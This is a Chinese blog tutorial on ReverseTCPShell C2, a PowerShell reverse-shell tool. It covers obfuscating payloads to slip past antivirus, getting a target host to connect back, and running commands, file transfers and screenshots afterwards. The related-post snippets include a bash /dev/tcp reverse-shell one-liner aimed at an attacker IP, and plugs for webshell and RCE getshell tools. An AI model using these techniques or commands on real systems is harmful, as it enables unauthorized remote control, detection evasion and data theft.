shell 工具_ReverseTCPShell C2 反弹shell工具

最新推荐文章于 2024-04-28 12:17:27 发布
最新推荐文章于 2024-04-28 12:17:27 发布
阅读量156 收藏
点赞数
文章标签: shell 工具 shell工具

ReverseTCPShell C2是一款powershell编写的反弹shell工具,流量经过AES加密,payload通过三种混淆方式可绕过一些杀软的检测。

测试:

1. 在文件目录下启动powershell

01b70c1f2059bfca6e50163049ece2de.png

2. .ReverseTCP.ps1 ,启动程序

3a865e4bef181f8cc290349c32e4c8d9.png

会出现这个界面,功能介绍,设置好lhost和lport(监听地址及端口)

Modules (模块) | - Show C2-Server Modules.(显示c2服务器模块)Info (信息)

| - Show Remote-Host Info.(显示远程主机信息)Upload (上传)

| - Upload File from Local-Host to Remote-Host.(上传文件从本地主机到远程主机。)Download(下载)

| - Download File from Remote-Host to Local-Host.(从远程主机下载文件到本地主机。)Screenshot (截图)

| - Save Screenshot from Remote-Host to Local-Host.(保存屏幕截图从远程主机到本地主机。)

02c1878687f8eca7a25cfb7286bb1860.png

可以看到三种混淆方式

83924fc20c1af5328f8ac20871f477d5.png

这里我选择的是base64,生成powershell和cmd的payload

22006568b4bfc6ecae61f82f52a925bd.png

复制出cmd的payload,靶机执行

47c8a350e815e40a3e1a35d7ec8d8cbc.png

靶机上线,杀软未提示和拦截

a0bd4ad6b6d343581b43d66e6204c64d.png

执行命令ipconfig

eb5320f15a00c2bee611f7350798d57a.png

可直接执行shell命令 ,截图经常报错,远程文件上传和下载,方便后渗透的进行,可进一步利用。

weixin_39520880
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
批量getshell工具新版
12-21
批量getshell工具【2023最新】这是一种内部有多个漏洞,可自动进行url采集,自动爬虫多个引擎和友情链接url,过狗一句话,轻松日出上千。
shell工具之awk
01-09
shell工具之awk ​ 一个强大的文本分析工具,把文件逐行的读入,以空格为默认的分割符并将每行切片,切开的部分在进行分析处理。 1.基本用法 awk [选项参数] ‘pattern1 {action} pattern2 {action}…’ filename ...
revshell 一款非常好用的生成反弹Shell命令的工具
ak.Gh0st的博客
08-09 881
revshell是一个由Go语言编写的反弹Shell工具,它是Reverse Shell Generator的命令行版本,旨在帮助安全研究人员和渗透测试人员在需要与目标主机建立反向连接时快速生成相应的Shell代码。目前支持的类型:除了支持多种Shell类型外,revshell还可以运行在多个操作系统平台上,包括Mac、Linux和Windows。这使得用户可以在不同的环境中使用revshell来生成适用于目标主机操作系统的反弹Shell代码,提高了工具的灵活性和适用性。
C2 shell
weixin_33841722的博客
12-18 125
1.什么是shell? 用户与内核之间的一个接口。最流行和常用的: bash。 2.重定向 > 重定向到另外的文件。0,1,2对一个程序来说是最常用的三个文件描述符! >>是把内容附加到文件的尾部而不会覆盖文件原有的内容。 这命令啥意思? #kill -HUP 1234 >kill.std 2>kill.stderr #kill -l 12...
渗透测试-window反弹shell
lza20001103的博客
05-11 4491
window反弹shell
JavaScript学习笔记(二十)DOM动画效果
最新发布
2401_84254011的博客
04-28 525
/0 ~ 100}else{//100// 3. 速度取整;}else{}else{// 4. 终止条件;} , 50)
工具分享】-反弹Shell在线编写工具
一只爱吃橙子的羊
04-18 2067
反弹Shell在线编写工具(可以作为离线版)
shell_priv_bear_shell_C2_
09-28
在IT安全领域,"shell_priv_bear_shell_C2_"这个标题暗示了我们正在讨论一个与高级持续性威胁(APT)组织Fancy Bear相关的特权shell服务器和指挥与控制(C2)通道。Fancy Bear,也被称为APT28或Sofacy,是一个著名的...
反弹shell工具源码
10-12
依赖PHP环境。修改IP、端口,自动生成命令
Maccms8RceBypass_horsen9f_getshell_MacCMSgetshell_菜刀工具mac_eateni
09-11
【标题】"Maccms8RceBypass_horsen9f_getshell_MacCMSgetshell_菜刀工具mac_eateni" 提供的是针对MacCMS 8.0版本的一个远程代码执行(RCE)漏洞利用工具,由'horsen9f'开发,并通过'mac_eateni'进行分享。这个工具...
好用的cmdshell反弹工具
06-19
好用的cmdshell反弹工具;好用的cmdshell反弹工具
ReverseTCPShell C2 反弹shell工具
sash1mi
11-21 602
ReverseTCPShell C2 反弹shell工具 ReverseTCPShell C2是一款powershell编写的反弹shell工具,流量经过AES加密,payload通过三种混淆方式可绕过一些杀软的检测。 Github下载地址:https://github.com/ZHacker13/ReverseTCPShell 1、在文件目录下启动powershell 2、.\ReverseTCP.ps1 ,启动程序 功能介绍,设置好lhost和lport(监听地址及端口) Modules (模块)
ReverseTcpshell使用教程
m0_53087192的博客
03-11 470
测试环境 攻击机:192.168.50.100 windows10 被攻击:192.168.50.101 windows server 2016 生成payload 使用powershellReverseTCP.ps1运行 设置监听ip,端口 生成两种payload,一种powershell,一种cmd。 复制一个payload,在被攻击机上运行,返回shell。 火绒全程无反应。 ...
网络安全-反弹shell详解(攻击,检测与防御)
2401_84466336的博客
04-23 4012
1.1 什么是 ShellShell 在计算机系统中指的是一个用户界面,用于访问操作系统的服务。在网络安全中,攻击者常利用 Shell 来控制受害者的系统。1.2 反弹 Shell 的工作原理反弹 Shell 的基本原理是:攻击者在其自己的机器上设置监听端口,然后诱使受害者的机器执行一个反向连接的 Shell 命令,连接回攻击者的机器。这样,攻击者就能通过这个反向连接执行命令,控制受害者的计算机。
反弹shell后上传文件
技术超强的网络安全平台
12-10 1316
转载于:https://www.freebuf.com/articles/system/178515.html 在本文中,我将介绍一款自己编写的小工具NcPutter,并用它来实现在只有bash反弹shell情况下的文件上传。在渗透测试过程中,我们可能会遇到这样一种情景,即已将让目标机通过bash反弹shell与我们的机器建立了连接,需要向目标机上上传木马或其他可执行文件来做进一步提权或进行内网渗透,很多人可能会采用在目标机上执行wget、ftp、curl、nc等工具命令获取相关可执行文件,可这些方法有以下
Reverse_tcp反向连接获得shell实验
热门推荐
把梦想放飞在蓝色的天空里...
08-08 1万+
Reverse_tcp反向连接获得shell实验 准备工作: VMWare的桥接模式: 这是一种很重要的模式,如图: 设置成桥接模式后,设置虚拟机里的ip地址时,其地址可以跟外边主机在同一个网段,同一个DNS,同样的掩码,虚拟机就相当于局域网里的另一台主机。 如果双方的防火墙都关闭了的话,主机和虚拟机是可以相互ping通的。 虚拟机还可以访问互联网,使用起来相当的方便。   简
base64解决shell反弹无法上传文件问题
技术超强的网络安全平台
12-10 2679
1、gcc xxx.c -o xxx编译一个c文件,也就相当于是exe 2、base64 xxx 切记xxx后面一定要有一个空格 3、复制黏贴后,在shell 中运行vim rr.64 复制内容上去 4、后面直接base64 -d rr.64 > rr就可以了
渗透测试常用反弹shell方法(如何渗透测试反弹shell?)-Windows篇(゚益゚メ) 渗透测试
寻觅的博客
04-07 3159
文章目录反弹shell介绍常用反弹方式NetCat(NC)反弹正向NC反向NCmshta.exe利用msf利用模块方法一(msfconsole)方法二(msfvenom)Cobaltstrike利用模块hta攻击源码rundll32.exe利用msf利用模块方法一(msfconsole)方法二(msfvenom)Rundll32加载htaRegsvr32.exe利用msiexec.exe利用powershell脚本绕过杀软混淆处理 反弹shell介绍 反弹shell主要就是让我们能远程连接到目标控制台并且下
各种shell反弹方法
weixin_46626737的博客
05-16 2660
s.connect(("攻击ip",port));再在目标机器执行bash -i > &/dev/tcp/攻击ip/端口 0>&1。post方式,ip=?2.使用nc进行反弹shell。6.使用php反弹shell
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值